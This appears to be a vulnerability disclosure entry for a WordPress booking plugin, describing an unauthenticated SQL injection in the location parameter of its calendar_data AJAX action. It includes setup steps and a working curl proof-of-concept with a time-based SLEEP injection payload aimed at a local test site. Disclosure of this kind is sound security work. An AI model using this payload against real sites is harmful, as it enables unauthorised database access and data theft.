The plugin does not sanitise and escape the location parameter of the calendar_data AJAX action (available to unauthenticated users) before it is used in dynamically constructed SQL queries, leading to an unauthenticated SQL injection
Create an "item" and a "location" via the newly added commonsbooking admin menu Take note of the item id and location id as they may be required for the exploit to work reliably Invoke the following curl command to trigger a 5 second sleep (via "location" parameter): curl http://127.0.0.1:8080/wp-admin/admin-ajax.php --data 'action=calendar_data&sd=2099-02-13&ed=2099-02-13&item=1&location=(SELECT 1743 FROM (SELECT(SLEEP(5)))iXxL3)' Note: + "sd" and "ed" are dates which should be in the future. + "item" should correspond to the item id you created previously (other values may work) + "location" is the injection point.
cydave
cydave
Yes
2022-02-21 (about 4 months ago)
2022-02-21 (about 4 months ago)
2022-04-12 (about 2 months ago)